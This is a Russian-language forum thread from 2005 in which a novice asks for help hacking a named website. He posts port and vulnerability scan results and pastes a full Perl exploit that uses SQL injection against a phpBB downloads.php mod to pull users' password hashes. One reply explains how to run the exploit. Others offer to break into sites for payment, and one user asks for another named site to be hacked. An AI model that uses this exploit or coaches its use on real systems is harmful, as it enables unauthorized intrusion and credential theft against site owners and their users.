ПОмагите взломать саййт
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
ПОмагите взломать саййт - 2005-06-10 11:38:59
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
сайт который я хочу пвзломать www.pcnuke.com
Я просканировал открытые порты {сканировал я nscan}
открытые порты :
80
53
26
25
22
21
Телнетюсь к 22 порту
версяя демона : SHH-1.99-OpenSHH_3.6.1p2
Затем просканировал сайт на наличие cgi шибок {сканировал DCS 2.1}
он показал :
что насервере стоит Apache/1.3.33 {Unix}mod_python/2.7.10 Plython/2.3.3 mod_auth_passthroug
атиперь сами уязвимости
www.pсnuke.com/~root - 403
www.pсnuke.com/cgi-bin/ - 403
www.pсnuke.com/cgi-bin/WindMail.exe?%20-n%20c:\boot.ini% - 500
www.pсnuke.com/?wp-cs-dump - [200 success]
www.pсnuke.com/?PageServices - [200 success]
www.pсnuke.com/config/html/cnf_gi.htm - [200 success]
www.pcnuke.com/.html/…………./config.sys - 403
Ещё там форум есть и его версия phpBB 2.0.13
А что дальше делать незнаю ведь это мой первый взлом
Эксплойт для версии форума :
Цель эксплоита: phpBB 2.0.13 и более ранние версии
Воздействие эксплоита: Получение хеша паролей
#!/usr/bin/perl -w
use IO::Socket;
## Example:
## C:\>phpbb.pl www.site.com /phpBB2/ 2
##
## downloads.php mod in phpBB <= 2.0.13
## **********************************
## [~] Connecting…
## [+] Connected!
## [~] Sending Data…
## [~] Data Sent, Waiting for response…
## [+] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
##
if (@ARGV < 3)
{
print "\n\n";
print "|****************************************************************|\n";
print " phpBB <=2.0.13 ''downloads.php'' Mod\n";
print " Bug found by Axl And CereBrums\n";
print " Coded by CereBrums // 2/4/2005\n";
print " Usage: phpbb.pl <site> <folder> <user_id>\n";
print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n";
print " [~] <server> - site address\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
$take = 0;
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "\n downloads.php mod in phpBB <= 2.0.13\n";
print " **********************************\n";
print " [~] Connecting…\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print " [+] Connected\n";
print " [~] Sending Data…\n";
$path = "http://$server/";
$path .= "/$folder/";
$path .= "downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*";
print $socket "GET $path HTTP/1.0\r\n\r\n";
print " [~] Data Sent, Waiting for response…\n";
while ($answer = <$socket>)
{
if ($take == 1) {
$pass = substr($answer,51,32);
print " [+] MD5 Hash for user with id=$user_id is: $pass\n";
$success = 1;
$take = 0;
}
$found = rindex ($answer,"downloads.php?view=detail&id=0&cat=0");
if ( $found > -1 ) {
$take = 1;
}
}
if ($success==0) {print " [-] Exploit failed\n";}
## EOF ##
# milw0rm.com [2005-04-02]
Но вот вчём проблема как его использовать я незнаю
[sm=9.gif][sm=9.gif][sm=9.gif]
-Хесть свой собственный шелл а как его там скомпить я не знаю
А что дальше делать незнаю ведь это мой первый взлом
-{ПОЖАЙЛУСТА ПОМОГИТЕ ПОЛУЧИТЬ ХОТЬ NOBODY ПРАВА
-{и если не затруднит попадробнее
-{заранее спасибо
ISQ 335218444
e-mail Folk_91@mail.ru
|
|
|
|
|
ПОмагите взломать саййт - 2005-06-10 11:56:58
|
|
|
deZZineSS
Сообщений: 73
Оценки: 0
Присоединился: 2004-08-24 21:32:20
|
## Example:<BR>## C:\>phpbb.pl www.site.com /phpBB2/ 2(Где 2 - id юзера, чей хеш ты хочешь утащить)<BR>##<BR>## downloads.php mod in phpBB <= 2.0.13
Надо смотреть внимательнее. Причем этот сплоит действует при наличии установленного модуля downloads.php.
|
|
|
|
|
ПОмагите взломать саййт - 2005-06-10 12:30:21
|
|
|
Sandro [Anthology_Murderer$]
Сообщений: 5
Оценки: 0
Присоединился: 2005-06-09 17:32:07
|
Эх Folk_91 гений науки!!![sm=001.gif]
http://www.pcnuke.com/ - у меня ваше не грузит!
Я могу тебе за деньги ломануть… если хочеш… пиши на мыло.
|
|
|
|
|
ПОмагите взломать саййт - 2005-06-10 12:47:13
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
Да,нет
я сам хочу этот сайт ломануть
|
|
|
|
|
ПОмагите взломать саййт - 2005-06-10 13:57:04
|
|
|
virk2000
Сообщений: 2
Оценки: 0
Присоединился: 2005-06-10 13:39:23
|
А ради справедливости не поможешь??? Просто максимум что могу заплатить так это 5 баксов…:( адрес http://design.dn.ua …
|
|
|
|
|
ПОмагите взломать саййт - 2005-06-11 19:37:37
|
|
|
[rapt0r]
Сообщений: 105
Оценки: 0
Присоединился: 2005-03-10 20:13:31
|
ну может и поможем, стучись в асю…
|
|
|
|
|
|
